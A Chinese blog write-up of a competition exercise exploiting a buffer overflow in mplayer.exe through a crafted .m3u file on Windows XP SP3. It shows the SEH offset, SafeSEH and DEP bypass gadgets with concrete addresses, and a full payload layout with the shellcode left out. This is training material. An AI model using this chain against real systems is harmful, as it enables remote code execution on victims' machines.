safeseh+dep保护绕过
【文章作者】 :h_one
【漏洞程序名称】:mplayer.exe
【漏洞类型】 :缓冲区溢出
【保护方式】 :safeseh+dep
【操作平台】 : xp sp3
【工具】 :windbg, immunity Debugger,mona等
ps:这个程序是前两年xx比赛的题目,肯定有朋友玩过了,要求是利用seh进行漏洞利用,同时开启dep保护。
我想,那时我应该在玩泥巴,不知道啥叫crack,fuzz,漏洞挖掘利用等。挖掘利用此漏洞的首先了解windows的safeseh,dep保护,以
及知道怎么绕过。还有在模糊测试时,要根据程序本身处理哪类文件,进而触发漏洞。在程序比较大功能比较多时,这真的就是体力活了,可是首先使用IDA静态分析,看一下目标地址是否为栈分配,源数据是否可控,然后锁定那个调用(堆栈回朔看前面函数处理),分析源数据是从哪里来的。这些杂七杂八的是个人对漏洞挖掘的理解吧.......下面进入本文正题
此次是在xp sp3下操作的,而xp sp3默认dep是关闭的,首先我们的开启dep保护

第一步:Fuzz,触发漏洞
此软件为音乐播放器,处理的数据一般的都.mp3 ,m3u,皮肤 文件。方法:体力+耐力+运气 不知道大家有没有什么好的方法能比较快的触发漏洞
首先利用immunity Debugger调试发现:程序在打开m3u文件时,会将m3u文件所在路径与数据一起拷贝,我是将测试文件放在桌面的。

利用msf创建m3u后缀的fuzz数据 发现在6k大小是 程序发生异常

第二步:利用no-safeSeh模块地址覆盖seh,绕过safesef,并返回到准备的数据缓冲区
接下来用windbg附加看看

发生了异常从上图看msvcrt!strcat+81:av异常
此时看看异常链情况
执行!exchain

异常链已被准备的数据覆盖,噢,,,,那么接下来可以利用覆盖seh得到程序控制权.
计算seh偏移

接下来用py写简单的脚本,junks 用0x90填充 方便后面修改
在5115出写上esh,由于是在xp sp3下对seh的攻击肯定是存在safeseh保护的,因此接下来要绕过safeseh保护。
safeseh绕过方法:
利用SafeSEH保护模块之外的地址
对于目前的大部分windows操作系统,其系统模块都受SafeSEH保护,可以选用未开启SafeSEH保护的模块来利用,比如漏洞软件本身自带的 dll文件,
这个可以借助OD插件SafeSEH来查看进程中各模块是否开启SafeSEH保护。除此之外,也可通过直接覆盖返回地址 (jmp/call
esp)来利用。另一种方法,如果esp +8 指向EXCEPTION_REGISTRATION 结构,那么你仍然可以寻找一个
pop/pop/ret指令组合(在加载模块的地址范围之外的空间),也可以正常工作。但如果你在程序的加载模块中找不到pop/pop/ret 指令,
你可以观察下esp/ebp,查看下这些寄存器距离nseh 的偏移,接下来就是查找这样的指令:
call dword ptr[esp+nn] / jmp dword ptr[esp+nn]
call dword ptr[ebp+nn] / jmp dword ptr[ebp+nn]
call dword ptr[ebp-nn] / jmp dword ptr[ebp-nn]
(其中的nn 就是寄存器的值到nseh 的偏移,偏移nn可能是: esp+8, esp+14, esp+1c, esp+2c, esp+44, esp+50, ebp+0c, ebp+24, ebp+30, ebp-04, ebp-0c, ebp-18)。
很幸运的可以发现软件本身自带的dll没有safeseh保护,找了一条pop pop retn= 0x6D7C4637
典型safeseh保护攻击模型
• 在nseh 上放置向后的跳转指令(跳转7 字节:jmp 0xfffffff9);
• 向后跳转足够长的地址以存放shellcode,并借此执行至shellcode;
• 把shellcode 放在用于覆盖异常处理结构的指令地址之前。
["\x90"*5115] + [nseh] + [seh] + "\x90\x90\x90\xcc"
no-safeseh
.......................................................................................................................................................................................................................................
覆盖超长字符找到seh地址 将其修改为加载模块之外地址,并下断点 shift+f9 查看异常处理时寄存器与堆栈情况


esp = 0x22E2DC
ebp = 0x22E2FC
看下我们输入的数据离此时esp多远

ForEsp: 0x22EBE5 - 0x22E2DC = 0x909
ForEbp: 0x22EBE5 - 0x22E2FC = 0x8E9
计算可了解到此时esp到我们准备数据至少位0x909,那么可以寻找指令add esp num (num >= 0x909) retn 这样程序就又可控了。

选择0x64998c87 (add esp 0x96c) 修改seh为0x64998c87,再此进行调试观察堆栈情况

覆盖seh之后 执行到0x64998C87观察堆栈情况 成功进入堆栈

我们的缓冲区起始于0x22EBE5 ,而现在esp指向0x22EC5C,这里经行简单的计算:
0x22EC5C-0x22EBE5 = 0x77(119)大概是这么多吧,这里可以直接在直接窗口里修改,然后二进制拷贝到winhex
呵呵,算是甩开safeseh了,这要进入我们准备的数据区,只要关闭dep跳入shellcode就算是胜利了。
现在构造的数据模型应该是:my buffer = “\x90” * 119+ “Close_dep” + “\x90” x (5115 – 119) +“\x2C\x0E\x0A\x6D” +“\x90” *nums;
(ps:)
第四步:关闭dep,指向shellcode
dep:
数据执行保护,算是目前windows上最强保护了
绕过方法:
1.ret2lib
其
思路为:将返回地址指向lib库中的代码,而不直接跳转到shellcode 去执行,进而实现恶意代码的运行。可以在库中找到一段执行系统命令的代
码,比如system()函数,用它的地址覆盖返回地址,此时即使NX/XD 禁止在堆栈上执行代码,但库中的代码依然是可以执行的。函数
system()可通过运行环境来执行其它程序,例如启动Shell等等。另外,还可以通过VirtualProtect函数来修改恶意代码所在内存页面
的执行权限,然后再将控制转移到恶意代码,其堆栈布局如下所示:
┏━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┓
┃ ┃ 恶意代码 ┃内存高地址
┃ ┣━━━━━━━━━━━━━━━━━┫┃
┃ ┃ lpflOldProtect ┃┃
┃ ┣━━━━━━━━━━━━━━━━━┫┃
┃ ┃ flNewProtect ┃┃栈
┃ 调用参数 ┣━━━━━━━━━━━━━━━━━┫┃
┃ ┃ dwSize ┃┃生
┃ ┣━━━━━━━━━━━━━━━━━┫┃
┃ ┃ lpAddress ┃┃长
┃ ┣━━━━━━━━━━━━━━━━━┫┃
┃ ┃ 恶意代码的入口地址 ┃┃方
┣━━━━━━━━━━━━╋━━━━━━━━━━━━━━━━━┫┃
┃ 返回地址 ┃ VirtualProtect函数地址 ┃┃向
┣━━━━━━━━━━━━╋━━━━━━━━━━━━━━━━━┫┃
┃ EBP上层函数堆栈基址 ┃ ┃┃
┣━━━━━━━━━━━━┫ ┃┃
┃ 异常例程入口地址(若有 ┃ 填充数据的覆盖区域 ┃┃
┃设置的话,比如try…catch)┃ (AAAAAAAA……) ┃┃
┣━━━━━━━━━━━━┫ ┃▼
┃ 局部变量 ┃ ┃内存低地址
┗━━━━━━━━━━━━┻━━━━━━━━━━━━━━━━━┛
本问绕过方法使用关闭dep
此方法的主要原理就是利用NtSetInformationProcess()函数来设置 KPROCESS 结构中的相关标志位,进而关闭DEP
具体实现思路
1.将al设置为1,比如指令mov al,1 / ret,然后用该指令地址覆盖返回地址:
利用OllyFindAddr插件可以找到绕过dep的指令地址
mov al 0x1 rent 地址:0x7c80c190

观察寄存器情况 堆栈情况 下图


| junks | mov al ,1; retn; | push esp pop ebp retn 0x4 | retn 0x24 | jmp esp | close_dep | jmp_shellcode | nop1s | shellcode | nop2s | add esp 0x96C;pop;pop;pop;retn; |
| "\x90"*0x73 | "\x90\xc1\x80\x7c" | "\xE5\xE0\x72\x7D" | "\xfd\x9f\x75\x7d" | "\xb4\xc1\xc5\x7d" | "\x24\xcd\x93\x7c" | "\xeb\x22\x90\x90" | "\x90" * 0x85 | "\x......\x" | "\x90"*num | "\x7D\x8c\x99\x64" |


到此成功绕过
safeseh+dep保护绕过的更多相关文章
- 利用 ROP 技术绕过 DEP 保护的一次简单尝试
\x 01 前言 DEP是数据执行保护的英文缩写,全称为Data Execution Prevention.数据执行保护(DEP) 是一套软硬件技术,能够在内存上执行额外检查以帮助防止在系统上运行恶意 ...
- SafeSEH原理及绕过技术浅析
SafeSEH原理及绕过技术浅析 作者:magictong 时间:2012年3月16日星期五 摘要:主要介绍SafeSEH的基本原理和SafeSEH的绕过技术,重点在原理介绍. 关键词:SafeSEH ...
- 基础知识 SafeSEH DEP ASLR SEHOP
大多是0day书上抄的 1.SafeSEH 机制: 首先:内存中有SEH表的备份(加密过的) 在调用异常出来函数前,RtlDispatchException()函数中的行为: Ⅰ.检查异常处理链是否位 ...
- PIE保护绕过
(一):partial write 开了PIE保护的程序,其低12位地址是固定的,所以我们可以采用partial write.但是我们不能写入一个半字节,所以选择写入两个字节,倒数地位进行爆破,范围是 ...
- 内存保护机制及绕过方法——通过伪造SEHOP链绕过SEHOP保护机制
1.1 SEHOP保护机制 1.1.1 SEHOP工作原理: SEHOP保护机制的核心就是检查SEH链的完整性,其验证代码如下: BOOL RtlIsValidHandler(handle ...
- 内存保护机制及绕过方法——利用Ret2Libc绕过DEP之ZwSetInformationProcess函数
1. DEP内存保护机制 1.1 DEP工作原理 分析缓冲区溢出攻击,其根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠 ...
- 使用ROP攻击绕过Windows的DEP
使用ROP攻击绕过Windows的DEP 基础知识 DEP DEP(Data Execution Prevention)意为数据执行保护,是Windows的一项安全机制,主要能够在内存上执行额外检查以 ...
- Linux下利用Ret2Libc绕过DEP
Linux下利用Ret2Libc绕过DEP ⑴. 原理分析: 系统库函数通常是不受DEP(关于DEP,可以查看我之前文章的详细介绍)保护的,所以通过将返回地址指向系统函数可以绕过DEP保护,所以可以 ...
- 内存保护机制及绕过方法——利用Ret2Libc绕过DEP之VirtualProtect函数
利用Ret2Libc绕过DEP之VirtualProtect函数 ⑴. 原理分析: i.相关概念: VirtualProtect()函数: BOOL WINAPI VirtualProtect( _ ...
随机推荐
- xtrabackup之Innobackupex全备数据库
一.Xtrabackup是什么: Xtrabackup是一个对InnoDB做数据备份的工具,支持在线热备份(备份时不影响数据读写),是商业备份工具InnoDB Hotbackup的一个很好的替代品. ...
- Python初学者笔记(4)-简单的通讯录
要求: 编写一个简单的通讯录 1.通讯录包含至少包含姓名.电话号码.电子邮箱:2.通讯录的信息能够保存在本地磁盘:3.通讯录查找特定人员的信息:4.通讯录能够修改特定人员的信息:5.通讯录能够删除特定 ...
- 【PHP】PHP中的类与对象
面向对象并不是PHP的关键,但PHP确实能很好的支持面向对象编程,而且类与对象也成为了PHP5的核心组成部分.PHP的面向对象特性让构建大型的复制应用成为可能,有了类与对象,就自然产生了各种编程范式和 ...
- C 几种异常机制简单讲述
引言 这是关于C中如何使用异常机制的讨论.顺带讲一讲C中魔法函数的setjmp内部机制.通过它实现高级的异常try...catch. 允许我先扯一段面试题. 对于计算机面试题. 算法题等.觉得还是有意 ...
- RAP开发入门-开发笔记
一.发布/运行 每次项目发布时需要在MANIFEST.MF->bulid中勾选依赖包.文件.代码等,避免报错 部署时项目可能会报一个baseline的错误,window->preferen ...
- .net 高效管理稀缺资源(数据库资源,文件资源等)
MSDN建议按照下面的模式实现IDisposable接口: public class Foo: IDisposable { public void Dispose() { Dispose(true); ...
- 使用angular封装echarts
Echarts是一个开源的图表组件,图表比较丰富,工作中需要用到它来搭建一个数据展示系统.但是系统原有的框架是基于angular的,而echarts是基于原生js的,如果直接使用的话就丢失了angul ...
- SVN中的常见错误(长期更新)
一 svn中的简写含义. A:add,新增 C:conflict,冲突 D:delete,删除 M:modify,本地已经修改 G:modify and merGed,本地文件修改并且和服务器的进行合 ...
- LNMP下wordpress无法切换主题,只显示当前主题解决方法
最近在lnmp下发现wordpress后台无法切换主题,只能显示当前主题,开始还以为是文件没传完,又重置了一遍,还是一样.百度得知,原来军哥的LNMP安装包默认关闭了scandir函数,为了安全考虑. ...
- [转]论window和Linux之长短
论window和Linux之长短 王垠 http://www.kerneltravel.net/jiqiao/whyLinux.htm — 摈弃 Windows 低效率的工作方式,发掘 Linux 身 ...
